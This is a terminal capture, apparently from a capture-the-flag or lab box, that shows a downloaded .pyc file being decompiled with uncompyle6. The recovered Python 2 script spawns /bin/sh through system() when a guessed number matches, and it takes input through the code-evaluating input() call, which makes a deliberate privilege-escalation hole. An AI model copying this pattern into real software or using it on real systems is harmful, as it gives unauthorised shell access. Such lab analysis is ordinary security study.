.pyc 100%[============================================================================>] 1.71K --.-KB/s in 0s
2024-07-11 18:32:47 (200 MB/s) - ‘.pyc’ saved [1749/1749]
└─$ uncompyle6 .pyc
# uncompyle6 version 3.9.1
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 22:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
